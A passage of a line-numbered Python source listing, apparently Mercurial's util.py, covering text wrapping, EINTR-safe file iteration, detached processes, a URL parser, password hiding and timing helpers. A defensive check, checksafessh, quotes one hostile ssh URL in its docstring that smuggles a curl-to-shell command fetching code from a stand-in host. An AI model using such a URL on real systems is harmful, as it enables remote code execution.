|
|||
2836 |
|
||||
2837 | # Nope, this line is full. |
|
|||
2838 | else: |
|
|||
2839 | break |
|
|||
2840 |
|
||||
2841 | # The current line is full, and the next chunk is too big to |
|
|||
2842 | # fit on *any* line (not just this one). |
|
|||
2843 | if chunks and colwidth(chunks[-1]) > width: |
|
|||
2844 | self._handle_long_word(chunks, cur_line, cur_len, width) |
|
|||
2845 |
|
||||
2846 | # If the last chunk on this line is all whitespace, drop it. |
|
|||
2847 | if (self.drop_whitespace and |
|
|||
2848 | cur_line and cur_line[-1].strip() == r''): |
|
|||
2849 | del cur_line[-1] |
|
|||
2850 |
|
||||
2851 | # Convert current line back to a string and store it in list |
|
|||
2852 | # of all lines (return value). |
|
|||
2853 | if cur_line: |
|
|||
2854 | lines.append(indent + r''.join(cur_line)) |
|
|||
2855 |
|
||||
2856 | return lines |
|
|||
2857 |
|
||||
2858 | global MBTextWrapper |
|
|||
2859 | MBTextWrapper = tw |
|
|||
2860 | return tw(**kwargs) |
|
|||
2861 |
|
||||
2862 | def wrap(line, width, initindent='', hangindent=''): |
|
|||
2863 | maxindent = max(len(hangindent), len(initindent)) |
|
|||
2864 | if width <= maxindent: |
|
|||
2865 | # adjust for weird terminal size |
|
|||
2866 | width = max(78, maxindent + 1) |
|
|||
2867 | line = line.decode(pycompat.sysstr(encoding.encoding), |
|
|||
2868 | pycompat.sysstr(encoding.encodingmode)) |
|
|||
2869 | initindent = initindent.decode(pycompat.sysstr(encoding.encoding), |
|
|||
2870 | pycompat.sysstr(encoding.encodingmode)) |
|
|||
2871 | hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding), |
|
|||
2872 | pycompat.sysstr(encoding.encodingmode)) |
|
|||
2873 | wrapper = MBTextWrapper(width=width, |
|
|||
2874 | initial_indent=initindent, |
|
|||
2875 | subsequent_indent=hangindent) |
|
|||
2876 | return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding)) |
|
|||
2877 |
|
||||
2878 | if (pyplatform.python_implementation() == 'CPython' and |
|
|||
2879 | sys.version_info < (3, 0)): |
|
|||
2880 | # There is an issue in CPython that some IO methods do not handle EINTR |
|
|||
2881 | # correctly. The following table shows what CPython version (and functions) |
|
|||
2882 | # are affected (buggy: has the EINTR bug, okay: otherwise): |
|
|||
2883 | # |
|
|||
2884 | # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0 |
|
|||
2885 | # -------------------------------------------------- |
|
|||
2886 | # fp.__iter__ | buggy | buggy | okay |
|
|||
2887 | # fp.read* | buggy | okay [1] | okay |
|
|||
2888 | # |
|
|||
2889 | # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo. |
|
|||
2890 | # |
|
|||
2891 | # Here we workaround the EINTR issue for fileobj.__iter__. Other methods |
|
|||
2892 | # like "read*" are ignored for now, as Python < 2.7.4 is a minority. |
|
|||
2893 | # |
|
|||
2894 | # Although we can workaround the EINTR issue for fp.__iter__, it is slower: |
|
|||
2895 | # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in |
|
|||
2896 | # CPython 2, because CPython 2 maintains an internal readahead buffer for |
|
|||
2897 | # fp.__iter__ but not other fp.read* methods. |
|
|||
2898 | # |
|
|||
2899 | # On modern systems like Linux, the "read" syscall cannot be interrupted |
|
|||
2900 | # when reading "fast" files like on-disk files. So the EINTR issue only |
|
|||
2901 | # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG) |
|
|||
2902 | # files approximately as "fast" files and use the fast (unsafe) code path, |
|
|||
2903 | # to minimize the performance impact. |
|
|||
2904 | if sys.version_info >= (2, 7, 4): |
|
|||
2905 | # fp.readline deals with EINTR correctly, use it as a workaround. |
|
|||
2906 | def _safeiterfile(fp): |
|
|||
2907 | return iter(fp.readline, '') |
|
|||
2908 | else: |
|
|||
2909 | # fp.read* are broken too, manually deal with EINTR in a stupid way. |
|
|||
2910 | # note: this may block longer than necessary because of bufsize. |
|
|||
2911 | def _safeiterfile(fp, bufsize=4096): |
|
|||
2912 | fd = fp.fileno() |
|
|||
2913 | line = '' |
|
|||
2914 | while True: |
|
|||
2915 | try: |
|
|||
2916 | buf = os.read(fd, bufsize) |
|
|||
2917 | except OSError as ex: |
|
|||
2918 | # os.read only raises EINTR before any data is read |
|
|||
2919 | if ex.errno == errno.EINTR: |
|
|||
2920 | continue |
|
|||
2921 | else: |
|
|||
2922 | raise |
|
|||
2923 | line += buf |
|
|||
2924 | if '\n' in buf: |
|
|||
2925 | splitted = line.splitlines(True) |
|
|||
2926 | line = '' |
|
|||
2927 | for l in splitted: |
|
|||
2928 | if l[-1] == '\n': |
|
|||
2929 | yield l |
|
|||
2930 | else: |
|
|||
2931 | line = l |
|
|||
2932 | if not buf: |
|
|||
2933 | break |
|
|||
2934 | if line: |
|
|||
2935 | yield line |
|
|||
2936 |
|
||||
2937 | def iterfile(fp): |
|
|||
2938 | fastpath = True |
|
|||
2939 | if type(fp) is file: |
|
|||
2940 | fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode) |
|
|||
2941 | if fastpath: |
|
|||
2942 | return fp |
|
|||
2943 | else: |
|
|||
2944 | return _safeiterfile(fp) |
|
|||
2945 | else: |
|
|||
2946 | # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed. |
|
|||
2947 | def iterfile(fp): |
|
|||
2948 | return fp |
|
|||
2949 |
|
||||
2950 | def iterlines(iterator): |
|
|||
2951 | for chunk in iterator: |
|
|||
2952 | for line in chunk.splitlines(): |
|
|||
2953 | yield line |
|
|||
2954 |
|
||||
2955 | def expandpath(path): |
|
|||
2956 | return os.path.expanduser(os.path.expandvars(path)) |
|
|||
2957 |
|
||||
2958 | def hgcmd(): |
|
|||
2959 | """Return the command used to execute current hg |
|
|||
2960 |
|
||||
2961 | This is different from hgexecutable() because on Windows we want |
|
|||
2962 | to avoid things opening new shell windows like batch files, so we |
|
|||
2963 | get either the python call or current executable. |
|
|||
2964 | """ |
|
|||
2965 | if mainfrozen(): |
|
|||
2966 | if getattr(sys, 'frozen', None) == 'macosx_app': |
|
|||
2967 | # Env variable set by py2app |
|
|||
2968 | return [encoding.environ['EXECUTABLEPATH']] |
|
|||
2969 | else: |
|
|||
2970 | return [pycompat.sysexecutable] |
|
|||
2971 | return gethgcmd() |
|
|||
2972 |
|
||||
2973 | def rundetached(args, condfn): |
|
|||
2974 | """Execute the argument list in a detached process. |
|
|||
2975 |
|
||||
2976 | condfn is a callable which is called repeatedly and should return |
|
|||
2977 | True once the child process is known to have started successfully. |
|
|||
2978 | At this point, the child process PID is returned. If the child |
|
|||
2979 | process fails to start or finishes before condfn() evaluates to |
|
|||
2980 | True, return -1. |
|
|||
2981 | """ |
|
|||
2982 | # Windows case is easier because the child process is either |
|
|||
2983 | # successfully starting and validating the condition or exiting |
|
|||
2984 | # on failure. We just poll on its PID. On Unix, if the child |
|
|||
2985 | # process fails to start, it will be left in a zombie state until |
|
|||
2986 | # the parent wait on it, which we cannot do since we expect a long |
|
|||
2987 | # running process on success. Instead we listen for SIGCHLD telling |
|
|||
2988 | # us our child process terminated. |
|
|||
2989 | terminated = set() |
|
|||
2990 | def handler(signum, frame): |
|
|||
2991 | terminated.add(os.wait()) |
|
|||
2992 | prevhandler = None |
|
|||
2993 | SIGCHLD = getattr(signal, 'SIGCHLD', None) |
|
|||
2994 | if SIGCHLD is not None: |
|
|||
2995 | prevhandler = signal.signal(SIGCHLD, handler) |
|
|||
2996 | try: |
|
|||
2997 | pid = spawndetached(args) |
|
|||
2998 | while not condfn(): |
|
|||
2999 | if ((pid in terminated or not testpid(pid)) |
|
|||
3000 | and not condfn()): |
|
|||
3001 | return -1 |
|
|||
3002 | time.sleep(0.1) |
|
|||
3003 | return pid |
|
|||
3004 | finally: |
|
|||
3005 | if prevhandler is not None: |
|
|||
3006 | signal.signal(signal.SIGCHLD, prevhandler) |
|
|||
3007 |
|
||||
3008 | def interpolate(prefix, mapping, s, fn=None, escape_prefix=False): |
|
|||
3009 | """Return the result of interpolating items in the mapping into string s. |
|
|||
3010 |
|
||||
3011 | prefix is a single character string, or a two character string with |
|
|||
3012 | a backslash as the first character if the prefix needs to be escaped in |
|
|||
3013 | a regular expression. |
|
|||
3014 |
|
||||
3015 | fn is an optional function that will be applied to the replacement text |
|
|||
3016 | just before replacement. |
|
|||
3017 |
|
||||
3018 | escape_prefix is an optional flag that allows using doubled prefix for |
|
|||
3019 | its escaping. |
|
|||
3020 | """ |
|
|||
3021 | fn = fn or (lambda s: s) |
|
|||
3022 | patterns = '|'.join(mapping.keys()) |
|
|||
3023 | if escape_prefix: |
|
|||
3024 | patterns += '|' + prefix |
|
|||
3025 | if len(prefix) > 1: |
|
|||
3026 | prefix_char = prefix[1:] |
|
|||
3027 | else: |
|
|||
3028 | prefix_char = prefix |
|
|||
3029 | mapping[prefix_char] = prefix_char |
|
|||
3030 | r = remod.compile(br'%s(%s)' % (prefix, patterns)) |
|
|||
3031 | return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) |
|
|||
3032 |
|
||||
3033 | def getport(port): |
|
|||
3034 | """Return the port for a given network service. |
|
|||
3035 |
|
||||
3036 | If port is an integer, it's returned as is. If it's a string, it's |
|
|||
3037 | looked up using socket.getservbyname(). If there's no matching |
|
|||
3038 | service, error.Abort is raised. |
|
|||
3039 | """ |
|
|||
3040 | try: |
|
|||
3041 | return int(port) |
|
|||
3042 | except ValueError: |
|
|||
3043 | pass |
|
|||
3044 |
|
||||
3045 | try: |
|
|||
3046 | return socket.getservbyname(pycompat.sysstr(port)) |
|
|||
3047 | except socket.error: |
|
|||
3048 | raise Abort(_("no port number associated with service '%s'") % port) |
|
|||
3049 |
|
||||
3050 | _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True, |
|
|||
3051 | '0': False, 'no': False, 'false': False, 'off': False, |
|
|||
3052 | 'never': False} |
|
|||
3053 |
|
||||
3054 | def parsebool(s): |
|
|||
3055 | """Parse s into a boolean. |
|
|||
3056 |
|
||||
3057 | If s is not a valid boolean, returns None. |
|
|||
3058 | """ |
|
|||
3059 | return _booleans.get(s.lower(), None) |
|
|||
3060 |
|
||||
3061 | _hextochr = dict((a + b, chr(int(a + b, 16))) |
|
|||
3062 | for a in string.hexdigits for b in string.hexdigits) |
|
|||
3063 |
|
||||
3064 | class url(object): |
|
|||
3065 | r"""Reliable URL parser. |
|
|||
3066 |
|
||||
3067 | This parses URLs and provides attributes for the following |
|
|||
3068 | components: |
|
|||
3069 |
|
||||
3070 | <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> |
|
|||
3071 |
|
||||
3072 | Missing components are set to None. The only exception is |
|
|||
3073 | fragment, which is set to '' if present but empty. |
|
|||
3074 |
|
||||
3075 | If parsefragment is False, fragment is included in query. If |
|
|||
3076 | parsequery is False, query is included in path. If both are |
|
|||
3077 | False, both fragment and query are included in path. |
|
|||
3078 |
|
||||
3079 | See http://www.ietf.org/rfc/rfc2396.txt for more information. |
|
|||
3080 |
|
||||
3081 | Note that for backward compatibility reasons, bundle URLs do not |
|
|||
3082 | take host names. That means 'bundle://../' has a path of '../'. |
|
|||
3083 |
|
||||
3084 | Examples: |
|
|||
3085 |
|
||||
3086 | >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') |
|
|||
3087 | <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> |
|
|||
3088 | >>> url(b'ssh://[::1]:2200//home/joe/repo') |
|
|||
3089 | <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> |
|
|||
3090 | >>> url(b'file:///home/joe/repo') |
|
|||
3091 | <url scheme: 'file', path: '/home/joe/repo'> |
|
|||
3092 | >>> url(b'file:///c:/temp/foo/') |
|
|||
3093 | <url scheme: 'file', path: 'c:/temp/foo/'> |
|
|||
3094 | >>> url(b'bundle:foo') |
|
|||
3095 | <url scheme: 'bundle', path: 'foo'> |
|
|||
3096 | >>> url(b'bundle://../foo') |
|
|||
3097 | <url scheme: 'bundle', path: '../foo'> |
|
|||
3098 | >>> url(br'c:\foo\bar') |
|
|||
3099 | <url path: 'c:\\foo\\bar'> |
|
|||
3100 | >>> url(br'\\blah\blah\blah') |
|
|||
3101 | <url path: '\\\\blah\\blah\\blah'> |
|
|||
3102 | >>> url(br'\\blah\blah\blah#baz') |
|
|||
3103 | <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> |
|
|||
3104 | >>> url(br'file:///C:\users\me') |
|
|||
3105 | <url scheme: 'file', path: 'C:\\users\\me'> |
|
|||
3106 |
|
||||
3107 | Authentication credentials: |
|
|||
3108 |
|
||||
3109 | >>> url(b'ssh://joe:xyz@x/repo') |
|
|||
3110 | <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> |
|
|||
3111 | >>> url(b'ssh://joe@x/repo') |
|
|||
3112 | <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> |
|
|||
3113 |
|
||||
3114 | Query strings and fragments: |
|
|||
3115 |
|
||||
3116 | >>> url(b'http://host/a?b#c') |
|
|||
3117 | <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> |
|
|||
3118 | >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) |
|
|||
3119 | <url scheme: 'http', host: 'host', path: 'a?b#c'> |
|
|||
3120 |
|
||||
3121 | Empty path: |
|
|||
3122 |
|
||||
3123 | >>> url(b'') |
|
|||
3124 | <url path: ''> |
|
|||
3125 | >>> url(b'#a') |
|
|||
3126 | <url path: '', fragment: 'a'> |
|
|||
3127 | >>> url(b'http://host/') |
|
|||
3128 | <url scheme: 'http', host: 'host', path: ''> |
|
|||
3129 | >>> url(b'http://host/#a') |
|
|||
3130 | <url scheme: 'http', host: 'host', path: '', fragment: 'a'> |
|
|||
3131 |
|
||||
3132 | Only scheme: |
|
|||
3133 |
|
||||
3134 | >>> url(b'http:') |
|
|||
3135 | <url scheme: 'http'> |
|
|||
3136 | """ |
|
|||
3137 |
|
||||
3138 | _safechars = "!~*'()+" |
|
|||
3139 | _safepchars = "/!~*'()+:\\" |
|
|||
3140 | _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match |
|
|||
3141 |
|
||||
3142 | def __init__(self, path, parsequery=True, parsefragment=True): |
|
|||
3143 | # We slowly chomp away at path until we have only the path left |
|
|||
3144 | self.scheme = self.user = self.passwd = self.host = None |
|
|||
3145 | self.port = self.path = self.query = self.fragment = None |
|
|||
3146 | self._localpath = True |
|
|||
3147 | self._hostport = '' |
|
|||
3148 | self._origpath = path |
|
|||
3149 |
|
||||
3150 | if parsefragment and '#' in path: |
|
|||
3151 | path, self.fragment = path.split('#', 1) |
|
|||
3152 |
|
||||
3153 | # special case for Windows drive letters and UNC paths |
|
|||
3154 | if hasdriveletter(path) or path.startswith('\\\\'): |
|
|||
3155 | self.path = path |
|
|||
3156 | return |
|
|||
3157 |
|
||||
3158 | # For compatibility reasons, we can't handle bundle paths as |
|
|||
3159 | # normal URLS |
|
|||
3160 | if path.startswith('bundle:'): |
|
|||
3161 | self.scheme = 'bundle' |
|
|||
3162 | path = path[7:] |
|
|||
3163 | if path.startswith('//'): |
|
|||
3164 | path = path[2:] |
|
|||
3165 | self.path = path |
|
|||
3166 | return |
|
|||
3167 |
|
||||
3168 | if self._matchscheme(path): |
|
|||
3169 | parts = path.split(':', 1) |
|
|||
3170 | if parts[0]: |
|
|||
3171 | self.scheme, path = parts |
|
|||
3172 | self._localpath = False |
|
|||
3173 |
|
||||
3174 | if not path: |
|
|||
3175 | path = None |
|
|||
3176 | if self._localpath: |
|
|||
3177 | self.path = '' |
|
|||
3178 | return |
|
|||
3179 | else: |
|
|||
3180 | if self._localpath: |
|
|||
3181 | self.path = path |
|
|||
3182 | return |
|
|||
3183 |
|
||||
3184 | if parsequery and '?' in path: |
|
|||
3185 | path, self.query = path.split('?', 1) |
|
|||
3186 | if not path: |
|
|||
3187 | path = None |
|
|||
3188 | if not self.query: |
|
|||
3189 | self.query = None |
|
|||
3190 |
|
||||
3191 | # // is required to specify a host/authority |
|
|||
3192 | if path and path.startswith('//'): |
|
|||
3193 | parts = path[2:].split('/', 1) |
|
|||
3194 | if len(parts) > 1: |
|
|||
3195 | self.host, path = parts |
|
|||
3196 | else: |
|
|||
3197 | self.host = parts[0] |
|
|||
3198 | path = None |
|
|||
3199 | if not self.host: |
|
|||
3200 | self.host = None |
|
|||
3201 | # path of file:///d is /d |
|
|||
3202 | # path of file:///d:/ is d:/, not /d:/ |
|
|||
3203 | if path and not hasdriveletter(path): |
|
|||
3204 | path = '/' + path |
|
|||
3205 |
|
||||
3206 | if self.host and '@' in self.host: |
|
|||
3207 | self.user, self.host = self.host.rsplit('@', 1) |
|
|||
3208 | if ':' in self.user: |
|
|||
3209 | self.user, self.passwd = self.user.split(':', 1) |
|
|||
3210 | if not self.host: |
|
|||
3211 | self.host = None |
|
|||
3212 |
|
||||
3213 | # Don't split on colons in IPv6 addresses without ports |
|
|||
3214 | if (self.host and ':' in self.host and |
|
|||
3215 | not (self.host.startswith('[') and self.host.endswith(']'))): |
|
|||
3216 | self._hostport = self.host |
|
|||
3217 | self.host, self.port = self.host.rsplit(':', 1) |
|
|||
3218 | if not self.host: |
|
|||
3219 | self.host = None |
|
|||
3220 |
|
||||
3221 | if (self.host and self.scheme == 'file' and |
|
|||
3222 | self.host not in ('localhost', '127.0.0.1', '[::1]')): |
|
|||
3223 | raise Abort(_('file:// URLs can only refer to localhost')) |
|
|||
3224 |
|
||||
3225 | self.path = path |
|
|||
3226 |
|
||||
3227 | # leave the query string escaped |
|
|||
3228 | for a in ('user', 'passwd', 'host', 'port', |
|
|||
3229 | 'path', 'fragment'): |
|
|||
3230 | v = getattr(self, a) |
|
|||
3231 | if v is not None: |
|
|||
3232 | setattr(self, a, urlreq.unquote(v)) |
|
|||
3233 |
|
||||
3234 | @encoding.strmethod |
|
|||
3235 | def __repr__(self): |
|
|||
3236 | attrs = [] |
|
|||
3237 | for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path', |
|
|||
3238 | 'query', 'fragment'): |
|
|||
3239 | v = getattr(self, a) |
|
|||
3240 | if v is not None: |
|
|||
3241 | attrs.append('%s: %r' % (a, v)) |
|
|||
3242 | return '<url %s>' % ', '.join(attrs) |
|
|||
3243 |
|
||||
3244 | def __bytes__(self): |
|
|||
3245 | r"""Join the URL's components back into a URL string. |
|
|||
3246 |
|
||||
3247 | Examples: |
|
|||
3248 |
|
||||
3249 | >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) |
|
|||
3250 | 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' |
|
|||
3251 | >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) |
|
|||
3252 | 'http://user:pw@host:80/?foo=bar&baz=42' |
|
|||
3253 | >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) |
|
|||
3254 | 'http://user:pw@host:80/?foo=bar%3dbaz' |
|
|||
3255 | >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) |
|
|||
3256 | 'ssh://user:pw@[::1]:2200//home/joe#' |
|
|||
3257 | >>> bytes(url(b'http://localhost:80//')) |
|
|||
3258 | 'http://localhost:80//' |
|
|||
3259 | >>> bytes(url(b'http://localhost:80/')) |
|
|||
3260 | 'http://localhost:80/' |
|
|||
3261 | >>> bytes(url(b'http://localhost:80')) |
|
|||
3262 | 'http://localhost:80/' |
|
|||
3263 | >>> bytes(url(b'bundle:foo')) |
|
|||
3264 | 'bundle:foo' |
|
|||
3265 | >>> bytes(url(b'bundle://../foo')) |
|
|||
3266 | 'bundle:../foo' |
|
|||
3267 | >>> bytes(url(b'path')) |
|
|||
3268 | 'path' |
|
|||
3269 | >>> bytes(url(b'file:///tmp/foo/bar')) |
|
|||
3270 | 'file:///tmp/foo/bar' |
|
|||
3271 | >>> bytes(url(b'file:///c:/tmp/foo/bar')) |
|
|||
3272 | 'file:///c:/tmp/foo/bar' |
|
|||
3273 | >>> print(url(br'bundle:foo\bar')) |
|
|||
3274 | bundle:foo\bar |
|
|||
3275 | >>> print(url(br'file:///D:\data\hg')) |
|
|||
3276 | file:///D:\data\hg |
|
|||
3277 | """ |
|
|||
3278 | if self._localpath: |
|
|||
3279 | s = self.path |
|
|||
3280 | if self.scheme == 'bundle': |
|
|||
3281 | s = 'bundle:' + s |
|
|||
3282 | if self.fragment: |
|
|||
3283 | s += '#' + self.fragment |
|
|||
3284 | return s |
|
|||
3285 |
|
||||
3286 | s = self.scheme + ':' |
|
|||
3287 | if self.user or self.passwd or self.host: |
|
|||
3288 | s += '//' |
|
|||
3289 | elif self.scheme and (not self.path or self.path.startswith('/') |
|
|||
3290 | or hasdriveletter(self.path)): |
|
|||
3291 | s += '//' |
|
|||
3292 | if hasdriveletter(self.path): |
|
|||
3293 | s += '/' |
|
|||
3294 | if self.user: |
|
|||
3295 | s += urlreq.quote(self.user, safe=self._safechars) |
|
|||
3296 | if self.passwd: |
|
|||
3297 | s += ':' + urlreq.quote(self.passwd, safe=self._safechars) |
|
|||
3298 | if self.user or self.passwd: |
|
|||
3299 | s += '@' |
|
|||
3300 | if self.host: |
|
|||
3301 | if not (self.host.startswith('[') and self.host.endswith(']')): |
|
|||
3302 | s += urlreq.quote(self.host) |
|
|||
3303 | else: |
|
|||
3304 | s += self.host |
|
|||
3305 | if self.port: |
|
|||
3306 | s += ':' + urlreq.quote(self.port) |
|
|||
3307 | if self.host: |
|
|||
3308 | s += '/' |
|
|||
3309 | if self.path: |
|
|||
3310 | # TODO: similar to the query string, we should not unescape the |
|
|||
3311 | # path when we store it, the path might contain '%2f' = '/', |
|
|||
3312 | # which we should *not* escape. |
|
|||
3313 | s += urlreq.quote(self.path, safe=self._safepchars) |
|
|||
3314 | if self.query: |
|
|||
3315 | # we store the query in escaped form. |
|
|||
3316 | s += '?' + self.query |
|
|||
3317 | if self.fragment is not None: |
|
|||
3318 | s += '#' + urlreq.quote(self.fragment, safe=self._safepchars) |
|
|||
3319 | return s |
|
|||
3320 |
|
||||
3321 | __str__ = encoding.strmethod(__bytes__) |
|
|||
3322 |
|
||||
3323 | def authinfo(self): |
|
|||
3324 | user, passwd = self.user, self.passwd |
|
|||
3325 | try: |
|
|||
3326 | self.user, self.passwd = None, None |
|
|||
3327 | s = bytes(self) |
|
|||
3328 | finally: |
|
|||
3329 | self.user, self.passwd = user, passwd |
|
|||
3330 | if not self.user: |
|
|||
3331 | return (s, None) |
|
|||
3332 | # authinfo[1] is passed to urllib2 password manager, and its |
|
|||
3333 | # URIs must not contain credentials. The host is passed in the |
|
|||
3334 | # URIs list because Python < 2.4.3 uses only that to search for |
|
|||
3335 | # a password. |
|
|||
3336 | return (s, (None, (s, self.host), |
|
|||
3337 | self.user, self.passwd or '')) |
|
|||
3338 |
|
||||
3339 | def isabs(self): |
|
|||
3340 | if self.scheme and self.scheme != 'file': |
|
|||
3341 | return True # remote URL |
|
|||
3342 | if hasdriveletter(self.path): |
|
|||
3343 | return True # absolute for our purposes - can't be joined() |
|
|||
3344 | if self.path.startswith(br'\\'): |
|
|||
3345 | return True # Windows UNC path |
|
|||
3346 | if self.path.startswith('/'): |
|
|||
3347 | return True # POSIX-style |
|
|||
3348 | return False |
|
|||
3349 |
|
||||
3350 | def localpath(self): |
|
|||
3351 | if self.scheme == 'file' or self.scheme == 'bundle': |
|
|||
3352 | path = self.path or '/' |
|
|||
3353 | # For Windows, we need to promote hosts containing drive |
|
|||
3354 | # letters to paths with drive letters. |
|
|||
3355 | if hasdriveletter(self._hostport): |
|
|||
3356 | path = self._hostport + '/' + self.path |
|
|||
3357 | elif (self.host is not None and self.path |
|
|||
3358 | and not hasdriveletter(path)): |
|
|||
3359 | path = '/' + path |
|
|||
3360 | return path |
|
|||
3361 | return self._origpath |
|
|||
3362 |
|
||||
3363 | def islocal(self): |
|
|||
3364 | '''whether localpath will return something that posixfile can open''' |
|
|||
3365 | return (not self.scheme or self.scheme == 'file' |
|
|||
3366 | or self.scheme == 'bundle') |
|
|||
3367 |
|
||||
3368 | def hasscheme(path): |
|
|||
3369 | return bool(url(path).scheme) |
|
|||
3370 |
|
||||
3371 | def hasdriveletter(path): |
|
|||
3372 | return path and path[1:2] == ':' and path[0:1].isalpha() |
|
|||
3373 |
|
||||
3374 | def urllocalpath(path): |
|
|||
3375 | return url(path, parsequery=False, parsefragment=False).localpath() |
|
|||
3376 |
|
||||
3377 | def checksafessh(path): |
|
|||
3378 | """check if a path / url is a potentially unsafe ssh exploit (SEC) |
|
|||
3379 |
|
||||
3380 | This is a sanity check for ssh urls. ssh will parse the first item as |
|
|||
3381 | an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. |
|
|||
3382 | Let's prevent these potentially exploited urls entirely and warn the |
|
|||
3383 | user. |
|
|||
3384 |
|
||||
3385 | Raises an error.Abort when the url is unsafe. |
|
|||
3386 | """ |
|
|||
3387 | path = urlreq.unquote(path) |
|
|||
3388 | if path.startswith('ssh://-') or path.startswith('svn+ssh://-'): |
|
|||
3389 | raise error.Abort(_('potentially unsafe url: %r') % |
|
|||
3390 | (path,)) |
|
|||
3391 |
|
||||
3392 | def hidepassword(u): |
|
|||
3393 | '''hide user credential in a url string''' |
|
|||
3394 | u = url(u) |
|
|||
3395 | if u.passwd: |
|
|||
3396 | u.passwd = '***' |
|
|||
3397 | return bytes(u) |
|
|||
3398 |
|
||||
3399 | def removeauth(u): |
|
|||
3400 | '''remove all authentication information from a url string''' |
|
|||
3401 | u = url(u) |
|
|||
3402 | u.user = u.passwd = None |
|
|||
3403 | return str(u) |
|
|||
3404 |
|
||||
3405 | timecount = unitcountfn( |
|
|||
3406 | (1, 1e3, _('%.0f s')), |
|
|||
3407 | (100, 1, _('%.1f s')), |
|
|||
3408 | (10, 1, _('%.2f s')), |
|
|||
3409 | (1, 1, _('%.3f s')), |
|
|||
3410 | (100, 0.001, _('%.1f ms')), |
|
|||
3411 | (10, 0.001, _('%.2f ms')), |
|
|||
3412 | (1, 0.001, _('%.3f ms')), |
|
|||
3413 | (100, 0.000001, _('%.1f us')), |
|
|||
3414 | (10, 0.000001, _('%.2f us')), |
|
|||
3415 | (1, 0.000001, _('%.3f us')), |
|
|||
3416 | (100, 0.000000001, _('%.1f ns')), |
|
|||
3417 | (10, 0.000000001, _('%.2f ns')), |
|
|||
3418 | (1, 0.000000001, _('%.3f ns')), |
|
|||
3419 | ) |
|
|||
3420 |
|
||||
3421 | _timenesting = [0] |
|
|||
3422 |
|
||||
3423 | def timed(func): |
|
|||
3424 | '''Report the execution time of a function call to stderr. |
|
|||
3425 |
|
||||
3426 | During development, use as a decorator when you need to measure |
|
|||
3427 | the cost of a function, e.g. as follows: |
|
|||
3428 |
|
||||
3429 | @util.timed |
|
|||
3430 | def foo(a, b, c): |
|
|||
3431 | pass |
|
|||
3432 | ''' |
|
|||
3433 |
|
||||
3434 | def wrapper(*args, **kwargs): |
|
|||
3435 | start = timer() |
|
|||
3436 | indent = 2 |
|
|||
3437 | _timenesting[0] += indent |
|
|||
3438 | try: |
|
|||
3439 | return func(*args, **kwargs) |
|
|||
3440 | finally: |
|
|||
3441 | elapsed = timer() - start |
|
|||
3442 | _timenesting[0] -= indent |
|
|||
3443 | stderr.write('%s%s: %s\n' % |
|
|||
3444 | (' ' * _timenesting[0], func.__name__, |
|
|||
3445 | timecount(elapsed))) |
|
|||
3446 | return wrapper |
|
|||
3447 |
|
||||
3448 | _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30), |
|
|||
3449 | ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1)) |
|
|||
3450 |
|
||||
3451 | def sizetoint(s): |
|
|||
3452 | '''Convert a space specifier to a byte count. |
|
|||
3453 |
|
||||
3454 | >>> sizetoint(b'30') |
|
|||
3455 | 30 |
|
|||
3456 | >>> sizetoint(b'2.2kb') |
|
|||
3457 | 2252 |
|
|||
3458 | >>> sizetoint(b'6M') |
|
|||
3459 | 6291456 |
|
|||
3460 | ''' |
|
|||
3461 | t = s.strip().lower() |
|
|||
3462 | try: |
|
|||
3463 | for k, u in _sizeunits: |
|
|||
3464 | if t.endswith(k): |
|
|||
3465 | return int(float(t[:-len(k)]) * u) |
|
|||
3466 | return int(t) |
|
|||
3467 | except ValueError: |
|
|||
3468 | raise error.ParseError(_("couldn't parse size: %s") % s) |
|
|||
3469 |
|
||||
3470 | class hooks(object): |
|
|||
3471 | '''A collection of hook functions that can be used to extend a |
|
|||
3472 | function's behavior. Hooks are called in lexicographic order, |
|
|||
3473 | based on the names of their sources.''' |
|
|||
3474 |
|
||||
3475 | def __init__(self): |
|
|||
3476 | self._hooks = [] |
|
|||
3477 |
|
||||
3478 | def add(self, source, hook): |
|
|||
3479 | self._hooks.append((source, hook)) |
|
|||
3480 |
|
||||
3481 | def __call__(self, *args): |
|
|||
3482 | self._hooks.sort(key=lambda x: x[0]) |
|
|||
3483 | results = [] |
|
|||
3484 | for source, hook in self._hooks: |
|
|||
3485 | results.append(hook(*args)) |
|
|||
3486 | return results |
|
|||
3487 |
|
||||
3488 | def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0): |
|
|||
3489 | '''Yields lines for a nicely formatted stacktrace. |
|
|||
3490 | Skips the 'skip' last entries, then return the last 'depth' entries. |
|
|||
3491 | Each file+linenumber is formatted according to fileline. |
|
|||
3492 | Each line is formatted according to line. |
|
|||
3493 | If line is None, it yields: |
|
|||
3494 | length of longest filepath+line number, |
|
|||
3495 | filepath+linenumber, |
|
|||
3496 | function |
|
|||
3497 |
|
||||
3498 | Not be used in production code but very convenient while developing. |
|
